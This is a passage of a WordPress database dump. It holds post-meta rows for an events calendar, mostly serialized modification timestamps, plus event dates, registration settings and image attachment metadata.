";i:1619641213;s:23:\"_RTEClimitRegistrations\";i:1619641213;s:21:\"_RTECmaxRegistrations\";i:1619641213;s:16:\"_EventRecurrence\";i:1619641213;s:18:\"_RTECnumRegistered\";i:1619641213;s:13:\"_EventVenueID\";i:1619641213;s:12:\"_dp_original\";i:1619641213;s:10:\"_edit_last\";i:1619641290;s:12:\"post_content\";i:1619642176;s:16:\"tribe_events_cat\";i:1619663776;s:11:\"post_status\";i:1619641660;s:10:\"post_title\";i:1619641761;}'),(140155,264782,'_EventEndDateUTC','2021-05-13 02:00:00'),(140130,264782,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1619641213;s:12:\"_EventOrigin\";i:1619641213;s:13:\"_thumbnail_id\";i:1619641660;s:24:\"boldgrid_hide_page_title\";i:1619641213;s:17:\"_EventShowMapLink\";i:1619641213;s:13:\"_EventShowMap\";i:1619641213;s:15:\"_EventStartDate\";i:1619641660;s:13:\"_EventEndDate\";i:1619641660;s:18:\"_EventStartDateUTC\";i:1619641660;s:16:\"_EventEndDateUTC\";i:1619641660;s:14:\"_EventDuration\";i:1619641213;s:20:\"_EventCurrencySymbol\";i:1619641213;s:22:\"_EventCurrencyPosition\";i:1619641213;s:10:\"_EventCost\";i:1619641213;s:9:\"_EventURL\";i:1619641213;s:14:\"_EventTimezone\";i:1619641213;s:18:\"_EventTimezoneAbbr\";i:1619641660;s:27:\"_EventNextPendingRecurrence\";i:1619641213;s:26:\"_RTECregistrationsDisabled\";i:1619641213;s:17:\"_RTECdeadlineType\";i:1619641213;s:19:\"_RTECwhoCanRegister\";i:1619641213;s:23:\"_RTEClimitRegistrations\";i:1619641213;s:21:\"_RTECmaxRegistrations\";i:1619641213;s:16:\"_EventRecurrence\";i:1619641213;s:18:\"_RTECnumRegistered\";i:1619641213;s:13:\"_EventVenueID\";i:1619641213;s:12:\"_dp_original\";i:1619641213;s:10:\"_edit_last\";i:1619641290;s:12:\"post_content\";i:1619642176;s:16:\"tribe_events_cat\";i:1619663776;s:11:\"post_status\";i:1619641660;s:10:\"post_title\";i:1619641761;}'),(140154,264782,'_EventStartDateUTC','2021-05-13 01:00:00'),(140160,264782,'_EventURL',''),(140131,264782,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1619641213;s:12:\"_EventOrigin\";i:1619641213;s:13:\"_thumbnail_id\";i:1619641660;s:24:\"boldgrid_hide_page_title\";i:1619641213;s:17:\"_EventShowMapLink\";i:1619641213;s:13:\"_EventShowMap\";i:1619641213;s:15:\"_EventStartDate\";i:1619641660;s:13:\"_EventEndDate\";i:1619641660;s:18:\"_EventStartDateUTC\";i:1619641660;s:16:\"_EventEndDateUTC\";i:1619641660;s:14:\"_EventDuration\";i:1619641213;s:20:\"_EventCurrencySymbol\";i:1619641213;s:22:\"_EventCurrencyPosition\";i:1619641213;s:10:\"_EventCost\";i:1619641213;s:9:\"_EventURL\";i:1619641213;s:14:\"_EventTimezone\";i:1619641213;s:18:\"_EventTimezoneAbbr\";i:1619641660;s:27:\"_EventNextPendingRecurrence\";i:1619641213;s:26:\"_RTECregistrationsDisabled\";i:1619641213;s:17:\"_RTECdeadlineType\";i:1619641213;s:19:\"_RTECwhoCanRegister\";i:1619641213;s:23:\"_RTEClimitRegistrations\";i:1619641213;s:21:\"_RTECmaxRegistrations\";i:1619641213;s:16:\"_EventRecurrence\";i:1619641213;s:18:\"_RTECnumRegistered\";i:1619641213;s:13:\"_EventVenueID\";i:1619641213;s:12:\"_dp_original\";i:1619641213;s:10:\"_edit_last\";i:1619641290;s:12:\"post_content\";i:1619642176;s:16:\"tribe_events_cat\";i:1619663776;s:11:\"post_status\";i:1619641660;s:10:\"post_title\";i:1619641761;}'),(140153,264782,'_EventEndDate','2021-05-12 20:00:00'),(140161,264782,'_EventTimezone','America/Denver'),(140132,264782,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1619641213;s:12:\"_EventOrigin\";i:1619641213;s:13:\"_thumbnail_id\";i:1619641660;s:24:\"boldgrid_hide_page_title\";i:1619641213;s:17:\"_EventShowMapLink\";i:1619641213;s:13:\"_EventShowMap\";i:1619641213;s:15:\"_EventStartDate\";i:1619641660;s:13:\"_EventEndDate\";i:1619641660;s:18:\"_EventStartDateUTC\";i:1619641660;s:16:\"_EventEndDateUTC\";i:1619641660;s:14:\"_EventDuration\";i:1619641213;s:20:\"_EventCurrencySymbol\";i:1619641213;s:22:\"_EventCurrencyPosition\";i:1619641213;s:10:\"_EventCost\";i:1619641213;s:9:\"_EventURL\";i:1619641213;s:14:\"_EventTimezone\";i:1619641213;s:18:\"_EventTimezoneAbbr\";i:1619641660;s:27:\"_EventNextPendingRecurrence\";i:1619641213;s:26:\"_RTECregistrationsDisabled\";i:1619641213;s:17:\"_RTECdeadlineType\";i:1619641213;s:19:\"_RTECwhoCanRegister\";i:1619641213;s:23:\"_RTEClimitRegistrations\";i:1619641213;s:21:\"_RTECmaxRegistrations\";i:1619641213;s:16:\"_EventRecurrence\";i:1619641213;s:18:\"_RTECnumRegistered\";i:1619641213;s:13:\"_EventVenueID\";i:1619641213;s:12:\"_dp_original\";i:1619641213;s:10:\"_edit_last\";i:1619641290;s:12:\"post_content\";i:1619642176;s:16:\"tribe_events_cat\";i:1619663776;s:11:\"post_status\";i:1619641660;s:10:\"post_title\";i:1619641761;}'),(140152,264782,'_EventStartDate','2021-05-12 19:00:00'),(140162,264782,'_EventTimezoneAbbr','MDT'),(140133,264782,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1619641213;s:12:\"_EventOrigin\";i:1619641213;s:13:\"_thumbnail_id\";i:1619641660;s:24:\"boldgrid_hide_page_title\";i:1619641213;s:17:\"_EventShowMapLink\";i:1619641213;s:13:\"_EventShowMap\";i:1619641213;s:15:\"_EventStartDate\";i:1619641660;s:13:\"_EventEndDate\";i:1619641660;s:18:\"_EventStartDateUTC\";i:1619641660;s:16:\"_EventEndDateUTC\";i:1619641660;s:14:\"_EventDuration\";i:1619641213;s:20:\"_EventCurrencySymbol\";i:1619641213;s:22:\"_EventCurrencyPosition\";i:1619641213;s:10:\"_EventCost\";i:1619641213;s:9:\"_EventURL\";i:1619641213;s:14:\"_EventTimezone\";i:1619641213;s:18:\"_EventTimezoneAbbr\";i:1619641660;s:27:\"_EventNextPendingRecurrence\";i:1619641213;s:26:\"_RTECregistrationsDisabled\";i:1619641213;s:17:\"_RTECdeadlineType\";i:1619641213;s:19:\"_RTECwhoCanRegister\";i:1619641213;s:23:\"_RTEClimitRegistrations\";i:1619641213;s:21:\"_RTECmaxRegistrations\";i:1619641213;s:16:\"_EventRecurrence\";i:1619641213;s:18:\"_RTECnumRegistered\";i:1619641213;s:13:\"_EventVenueID\";i:1619641213;s:12:\"_dp_original\";i:1619641213;s:10:\"_edit_last\";i:1619641290;s:12:\"post_content\";i:1619642176;s:16:\"tribe_events_cat\";i:1619663776;s:11:\"post_status\";i:1619641660;s:10:\"post_title\";i:1619641761;}'),(140151,264782,'_EventShowMap',''),(140163,264782,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(140134,264782,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1619641213;s:12:\"_EventOrigin\";i:1619641213;s:13:\"_thumbnail_id\";i:1619641660;s:24:\"boldgrid_hide_page_title\";i:1619641213;s:17:\"_EventShowMapLink\";i:1619641213;s:13:\"_EventShowMap\";i:1619641213;s:15:\"_EventStartDate\";i:1619641660;s:13:\"_EventEndDate\";i:1619641660;s:18:\"_EventStartDateUTC\";i:1619641660;s:16:\"_EventEndDateUTC\";i:1619641660;s:14:\"_EventDuration\";i:1619641213;s:20:\"_EventCurrencySymbol\";i:1619641213;s:22:\"_EventCurrencyPosition\";i:1619641213;s:10:\"_EventCost\";i:1619641213;s:9:\"_EventURL\";i:1619641213;s:14:\"_EventTimezone\";i:1619641213;s:18:\"_EventTimezoneAbbr\";i:1619641660;s:27:\"_EventNextPendingRecurrence\";i:1619641213;s:26:\"_RTECregistrationsDisabled\";i:1619641213;s:17:\"_RTECdeadlineType\";i:1619641213;s:19:\"_RTECwhoCanRegister\";i:1619641213;s:23:\"_RTEClimitRegistrations\";i:1619641213;s:21:\"_RTECmaxRegistrations\";i:1619641213;s:16:\"_EventRecurrence\";i:1619641213;s:18:\"_RTECnumRegistered\";i:1619641213;s:13:\"_EventVenueID\";i:1619641213;s:12:\"_dp_original\";i:1619641213;s:10:\"_edit_last\";i:1619641290;s:12:\"post_content\";i:1619642176;s:16:\"tribe_events_cat\";i:1619663776;s:11:\"post_status\";i:1619641660;s:10:\"post_title\";i:1619641761;}'),(140150,264782,'_EventShowMapLink',''),(140164,264782,'_RTECregistrationsDisabled','1'),(140165,264782,'_RTECdeadlineType','start'),(140135,264782,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1619641213;s:12:\"_EventOrigin\";i:1619641213;s:13:\"_thumbnail_id\";i:1619641660;s:24:\"boldgrid_hide_page_title\";i:1619641213;s:17:\"_EventShowMapLink\";i:1619641213;s:13:\"_EventShowMap\";i:1619641213;s:15:\"_EventStartDate\";i:1619641660;s:13:\"_EventEndDate\";i:1619641660;s:18:\"_EventStartDateUTC\";i:1619641660;s:16:\"_EventEndDateUTC\";i:1619641660;s:14:\"_EventDuration\";i:1619641213;s:20:\"_EventCurrencySymbol\";i:1619641213;s:22:\"_EventCurrencyPosition\";i:1619641213;s:10:\"_EventCost\";i:1619641213;s:9:\"_EventURL\";i:1619641213;s:14:\"_EventTimezone\";i:1619641213;s:18:\"_EventTimezoneAbbr\";i:1619641660;s:27:\"_EventNextPendingRecurrence\";i:1619641213;s:26:\"_RTECregistrationsDisabled\";i:1619641213;s:17:\"_RTECdeadlineType\";i:1619641213;s:19:\"_RTECwhoCanRegister\";i:1619641213;s:23:\"_RTEClimitRegistrations\";i:1619641213;s:21:\"_RTECmaxRegistrations\";i:1619641213;s:16:\"_EventRecurrence\";i:1619641213;s:18:\"_RTECnumRegistered\";i:1619641213;s:13:\"_EventVenueID\";i:1619641213;s:12:\"_dp_original\";i:1619641213;s:10:\"_edit_last\";i:1619641290;s:12:\"post_content\";i:1619642176;s:16:\"tribe_events_cat\";i:1619663776;s:11:\"post_status\";i:1619641660;s:10:\"post_title\";i:1619641761;}'),(140149,264782,'boldgrid_hide_page_title','0'),(140166,264782,'_RTECwhoCanRegister','any'),(140136,264782,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1619641213;s:12:\"_EventOrigin\";i:1619641213;s:13:\"_thumbnail_id\";i:1619641660;s:24:\"boldgrid_hide_page_title\";i:1619641213;s:17:\"_EventShowMapLink\";i:1619641213;s:13:\"_EventShowMap\";i:1619641213;s:15:\"_EventStartDate\";i:1619641660;s:13:\"_EventEndDate\";i:1619641660;s:18:\"_EventStartDateUTC\";i:1619641660;s:16:\"_EventEndDateUTC\";i:1619641660;s:14:\"_EventDuration\";i:1619641213;s:20:\"_EventCurrencySymbol\";i:1619641213;s:22:\"_EventCurrencyPosition\";i:1619641213;s:10:\"_EventCost\";i:1619641213;s:9:\"_EventURL\";i:1619641213;s:14:\"_EventTimezone\";i:1619641213;s:18:\"_EventTimezoneAbbr\";i:1619641660;s:27:\"_EventNextPendingRecurrence\";i:1619641213;s:26:\"_RTECregistrationsDisabled\";i:1619641213;s:17:\"_RTECdeadlineType\";i:1619641213;s:19:\"_RTECwhoCanRegister\";i:1619641213;s:23:\"_RTEClimitRegistrations\";i:1619641213;s:21:\"_RTECmaxRegistrations\";i:1619641213;s:16:\"_EventRecurrence\";i:1619641213;s:18:\"_RTECnumRegistered\";i:1619641213;s:13:\"_EventVenueID\";i:1619641213;s:12:\"_dp_original\";i:1619641213;s:10:\"_edit_last\";i:1619641290;s:12:\"post_content\";i:1619642176;s:16:\"tribe_events_cat\";i:1619663776;s:11:\"post_status\";i:1619641660;s:10:\"post_title\";i:1619641761;}'),(140138,264782,'_EventOrigin','events-calendar'),(140139,264782,'_EventOrigin','events-calendar'),(140140,264782,'_EventOrigin','events-calendar'),(140141,264782,'_EventOrigin','events-calendar'),(140142,264782,'_EventOrigin','events-calendar'),(140143,264782,'_EventOrigin','events-calendar'),(140144,264782,'_EventOrigin','events-calendar'),(140145,264782,'_EventOrigin','events-calendar'),(140146,264782,'_EventOrigin','events-calendar'),(140147,264782,'_EventOrigin','events-calendar'),(140137,264782,'_EventOrigin','events-calendar'),(140167,264782,'_RTEClimitRegistrations','0'),(140168,264782,'_RTECmaxRegistrations','30'),(140169,264782,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(140170,264782,'_RTECnumRegistered','0'),(140171,264782,'_EventVenueID','262435'),(140173,264782,'_dp_original','263641'),(140174,264782,'_edit_lock','1620590329:2'),(140175,264782,'_edit_last','2'),(142642,265043,'_wp_attached_file','2021/05/eck-soul-adv-2.png'),(142643,265043,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:231;s:6:\"height\";i:154;s:4:\"file\";s:26:\"2021/05/eck-soul-adv-2.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"eck-soul-adv-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(142654,265037,'original-file','2021/05/blog-1-updraft-pre-smush-original.png'),(142657,265037,'smush-complete','1'),(193694,269204,'_field_654','Allene'),(150958,265941,'_wp_attached_file','2021/11/podcast-bk-4.jpg'),(150959,265941,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1283;s:6:\"height\";i:638;s:4:\"file\";s:24:\"2021/11/podcast-bk-4.jpg\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"podcast-bk-4-300x149.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:149;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"podcast-bk-4-1024x509.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:509;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"podcast-bk-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"podcast-bk-4-768x382.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:24:\"podcast-bk-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:24:\"podcast-bk-4-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:24:\"podcast-bk-4-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:24:\"podcast-bk-4-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"podcast-bk-4-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(150960,265941,'original-file','2021/11/podcast-bk-4-updraft-pre-smush-original.jpg'),(150961,265941,'smush-complete','1'),(150962,265941,'smush-info','The file was compressed from 144.80 KB to 138.33 KB saving 4.47 percent using WP-Optimize'),(150963,265941,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:148279;s:12:\"smushed-size\";i:141649;s:15:\"savings-percent\";d:4.46999999999999975131004248396493494510650634765625;}'),(162539,264901,'_wp_old_date','2022-02-18'),(150969,265944,'_wp_attached_file','2021/11/podcast-bk-5.jpg'),(150970,265944,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1283;s:6:\"height\";i:638;s:4:\"file\";s:24:\"2021/11/podcast-bk-5.jpg\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"podcast-bk-5-300x149.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:149;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"podcast-bk-5-1024x509.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:509;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"podcast-bk-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"podcast-bk-5-768x382.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:24:\"podcast-bk-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:24:\"podcast-bk-5-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:24:\"podcast-bk-5-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:24:\"podcast-bk-5-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"podcast-bk-5-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(143225,265105,'mec_op','a:0:{}'),(143259,265096,'smush-complete','1'),(143168,265101,'_field_425','Verna'),(140321,264797,'_tribe_modified_fields','a:35:{s:16:\"protect_children\";i:1619714965;s:12:\"_EventOrigin\";i:1619714965;s:13:\"_thumbnail_id\";i:1619716231;s:24:\"boldgrid_hide_page_title\";i:1619714965;s:17:\"_EventShowMapLink\";i:1619714965;s:13:\"_EventShowMap\";i:1619714965;s:15:\"_EventStartDate\";i:1619716231;s:13:\"_EventEndDate\";i:1619716231;s:18:\"_EventStartDateUTC\";i:1619716231;s:16:\"_EventEndDateUTC\";i:1619716232;s:14:\"_EventDuration\";i:1619714965;s:20:\"_EventCurrencySymbol\";i:1619714965;s:22:\"_EventCurrencyPosition\";i:1619714965;s:10:\"_EventCost\";i:1619714965;s:9:\"_EventURL\";i:1619714965;s:14:\"_EventTimezone\";i:1619714965;s:18:\"_EventTimezoneAbbr\";i:1619714965;s:27:\"_EventNextPendingRecurrence\";i:1619714965;s:26:\"_RTECregistrationsDisabled\";i:1619714965;s:17:\"_RTECdeadlineType\";i:1619714965;s:19:\"_RTECwhoCanRegister\";i:1619714965;s:23:\"_RTEClimitRegistrations\";i:1619714965;s:21:\"_RTECmaxRegistrations\";i:1619714965;s:16:\"_EventRecurrence\";i:1619714965;s:18:\"_RTECnumRegistered\";i:1619714965;s:13:\"_EventVenueID\";i:1619714965;s:12:\"_dp_original\";i:1619714965;s:16:\"tribe_events_cat\";i:1619922109;s:10:\"_edit_last\";i:1619715086;s:10:\"post_title\";i:1619900270;s:12:\"post_content\";i:1619900509;s:11:\"post_status\";i:1619716231;s:35:\"passster_activate_global_protection\";i:1619900270;s:28:\"passster_activate_protection\";i:1619900270;s:24:\"passster_protection_type\";i:1619900270;}'),(140348,264797,'_EventEndDateUTC','2021-05-06 02:00:00'),(140322,264797,'_tribe_modified_fields','a:35:{s:16:\"protect_children\";i:1619714965;s:12:\"_EventOrigin\";i:1619714965;s:13:\"_thumbnail_id\";i:1619716231;s:24:\"boldgrid_hide_page_title\";i:1619714965;s:17:\"_EventShowMapLink\";i:1619714965;s:13:\"_EventShowMap\";i:1619714965;s:15:\"_EventStartDate\";i:1619716231;s:13:\"_EventEndDate\";i:1619716231;s:18:\"_EventStartDateUTC\";i:1619716231;s:16:\"_EventEndDateUTC\";i:1619716232;s:14:\"_EventDuration\";i:1619714965;s:20:\"_EventCurrencySymbol\";i:1619714965;s:22:\"_EventCurrencyPosition\";i:1619714965;s:10:\"_EventCost\";i:1619714965;s:9:\"_EventURL\";i:1619714965;s:14:\"_EventTimezone\";i:1619714965;s:18:\"_EventTimezoneAbbr\";i:1619714965;s:27:\"_EventNextPendingRecurrence\";i:1619714965;s:26:\"_RTECregistrationsDisabled\";i:1619714965;s:17:\"_RTECdeadlineType\";i:1619714965;s:19:\"_RTECwhoCanRegister\";i:1619714965;s:23:\"_RTEClimitRegistrations\";i:1619714965;s:21:\"_RTECmaxRegistrations\";i:1619714965;s:16:\"_EventRecurrence\";i:1619714965;s:18:\"_RTECnumRegistered\";i:1619714965;s:13:\"_EventVenueID\";i:1619714965;s:12:\"_dp_original\";i:1619714965;s:16:\"tribe_events_cat\";i:1619922109;s:10:\"_edit_last\";i:1619715086;s:10:\"post_title\";i:1619900270;s:12:\"post_content\";i:1619900509;s:11:\"post_status\";i:1619716231;s:35:\"passster_activate_global_protection\";i:1619900270;s:28:\"passster_activate_protection\";i:1619900270;s:24:\"passster_protection_type\";i:1619900270;}'),(140347,264797,'_EventStartDateUTC','2021-05-06 01:00:00'),(140352,264797,'_EventCost',''),(140323,264797,'_tribe_modified_fields','a:35:{s:16:\"protect_children\";i:1619714965;s:12:\"_EventOrigin\";i:1619714965;s:13:\"_thumbnail_id\";i:1619716231;s:24:\"boldgrid_hide_page_title\";i:1619714965;s:17:\"_EventShowMapLink\";i:1619714965;s:13:\"_EventShowMap\";i:1619714965;s:15:\"_EventStartDate\";i:1619716231;s:13:\"_EventEndDate\";i:1619716231;s:18:\"_EventStartDateUTC\";i:1619716231;s:16:\"_EventEndDateUTC\";i:1619716232;s:14:\"_EventDuration\";i:1619714965;s:20:\"_EventCurrencySymbol\";i:1619714965;s:22:\"_EventCurrencyPosition\";i:1619714965;s:10:\"_EventCost\";i:1619714965;s:9:\"_EventURL\";i:1619714965;s:14:\"_EventTimezone\";i:1619714965;s:18:\"_EventTimezoneAbbr\";i:1619714965;s:27:\"_EventNextPendingRecurrence\";i:1619714965;s:26:\"_RTECregistrationsDisabled\";i:1619714965;s:17:\"_RTECdeadlineType\";i:1619714965;s:19:\"_RTECwhoCanRegister\";i:1619714965;s:23:\"_RTEClimitRegistrations\";i:1619714965;s:21:\"_RTECmaxRegistrations\";i:1619714965;s:16:\"_EventRecurrence\";i:1619714965;s:18:\"_RTECnumRegistered\";i:1619714965;s:13:\"_EventVenueID\";i:1619714965;s:12:\"_dp_original\";i:1619714965;s:16:\"tribe_events_cat\";i:1619922109;s:10:\"_edit_last\";i:1619715086;s:10:\"post_title\";i:1619900270;s:12:\"post_content\";i:1619900509;s:11:\"post_status\";i:1619716231;s:35:\"passster_activate_global_protection\";i:1619900270;s:28:\"passster_activate_protection\";i:1619900270;s:24:\"passster_protection_type\";i:1619900270;}'),(140346,264797,'_EventEndDate','2021-05-05 20:00:00'),(140324,264797,'_tribe_modified_fields','a:35:{s:16:\"protect_children\";i:1619714965;s:12:\"_EventOrigin\";i:1619714965;s:13:\"_thumbnail_id\";i:1619716231;s:24:\"boldgrid_hide_page_title\";i:1619714965;s:17:\"_EventShowMapLink\";i:1619714965;s:13:\"_EventShowMap\";i:1619714965;s:15:\"_EventStartDate\";i:1619716231;s:13:\"_EventEndDate\";i:1619716231;s:18:\"_EventStartDateUTC\";i:1619716231;s:16:\"_EventEndDateUTC\";i:1619716232;s:14:\"_EventDuration\";i:1619714965;s:20:\"_EventCurrencySymbol\";i:1619714965;s:22:\"_EventCurrencyPosition\";i:1619714965;s:10:\"_EventCost\";i:1619714965;s:9:\"_EventURL\";i:1619714965;s:14:\"_EventTimezone\";i:1619714965;s:18:\"_EventTimezoneAbbr\";i:1619714965;s:27:\"_EventNextPendingRecurrence\";i:1619714965;s:26:\"_RTECregistrationsDisabled\";i:1619714965;s:17:\"_RTECdeadlineType\";i:1619714965;s:19:\"_RTECwhoCanRegister\";i:1619714965;s:23:\"_RTEClimitRegistrations\";i:1619714965;s:21:\"_RTECmaxRegistrations\";i:1619714965;s:16:\"_EventRecurrence\";i:1619714965;s:18:\"_RTECnumRegistered\";i:1619714965;s:13:\"_EventVenueID\";i:1619714965;s:12:\"_dp_original\";i:1619714965;s:16:\"tribe_events_cat\";i:1619922109;s:10:\"_edit_last\";i:1619715086;s:10:\"post_title\";i:1619900270;s:12:\"post_content\";i:1619900509;s:11:\"post_status\";i:1619716231;s:35:\"passster_activate_global_protection\";i:1619900270;s:28:\"passster_activate_protection\";i:1619900270;s:24:\"passster_protection_type\";i:1619900270;}'),(140345,264797,'_EventStartDate','2021-05-05 19:00:00'),(140353,264797,'_EventURL',''),(140354,264797,'_EventTimezone','America/Denver'),(140325,264797,'_tribe_modified_fields','a:35:{s:16:\"protect_children\";i:1619714965;s:12:\"_EventOrigin\";i:1619714965;s:13:\"_thumbnail_id\";i:1619716231;s:24:\"boldgrid_hide_page_title\";i:1619714965;s:17:\"_EventShowMapLink\";i:1619714965;s:13:\"_EventShowMap\";i:1619714965;s:15:\"_EventStartDate\";i:1619716231;s:13:\"_EventEndDate\";i:1619716231;s:18:\"_EventStartDateUTC\";i:1619716231;s:16:\"_EventEndDateUTC\";i:1619716232;s:14:\"_EventDuration\";i:1619714965;s:20:\"_EventCurrencySymbol\";i:1619714965;s:22:\"_EventCurrencyPosition\";i:1619714965;s:10:\"_EventCost\";i:1619714965;s:9:\"_EventURL\";i:1619714965;s:14:\"_EventTimezone\";i:1619714965;s:18:\"_EventTimezoneAbbr\";i:1619714965;s:27:\"_EventNextPendingRecurrence\";i:1619714965;s:26:\"_RTECregistrationsDisabled\";i:1619714965;s:17:\"_RTECdeadlineType\";i:1619714965;s:19:\"_RTECwhoCanRegister\";i:1619714965;s:23:\"_RTEClimitRegistrations\";i:1619714965;s:21:\"_RTECmaxRegistrations\";i:1619714965;s:16:\"_EventRecurrence\";i:1619714965;s:18:\"_RTECnumRegistered\";i:1619714965;s:13:\"_EventVenueID\";i:1619714965;s:12:\"_dp_original\";i:1619714965;s:16:\"tribe_events_cat\";i:1619922109;s:10:\"_edit_last\";i:1619715086;s:10:\"post_title\";i:1619900270;s:12:\"post_content\";i:1619900509;s:11:\"post_status\";i:1619716231;s:35:\"passster_activate_global_protection\";i:1619900270;s:28:\"passster_activate_protection\";i:1619900270;s:24:\"passster_protection_type\";i:1619900270;}'),(140344,264797,'_EventShowMap',''),(140355,264797,'_EventTimezoneAbbr','MDT'),(140326,264797,'_tribe_modified_fields','a:35:{s:16:\"protect_children\";i:1619714965;s:12:\"_EventOrigin\";i:1619714965;s:13:\"_thumbnail_id\";i:1619716231;s:24:\"boldgrid_hide_page_title\";i:1619714965;s:17:\"_EventShowMapLink\";i:1619714965;s:13:\"_EventShowMap\";i:1619714965;s:15:\"_EventStartDate\";i:1619716231;s:13:\"_EventEndDate\";i:1619716231;s:18:\"_EventStartDateUTC\";i:1619716231;s:16:\"_EventEndDateUTC\";i:1619716232;s:14:\"_EventDuration\";i:1619714965;s:20:\"_EventCurrencySymbol\";i:1619714965;s:22:\"_EventCurrencyPosition\";i:1619714965;s:10:\"_EventCost\";i:1619714965;s:9:\"_EventURL\";i:1619714965;s:14:\"_EventTimezone\";i:1619714965;s:18:\"_EventTimezoneAbbr\";i:1619714965;s:27:\"_EventNextPendingRecurrence\";i:1619714965;s:26:\"_RTECregistrationsDisabled\";i:1619714965;s:17:\"_RTECdeadlineType\";i:1619714965;s:19:\"_RTECwhoCanRegister\";i:1619714965;s:23:\"_RTEClimitRegistrations\";i:1619714965;s:21:\"_RTECmaxRegistrations\";i:1619714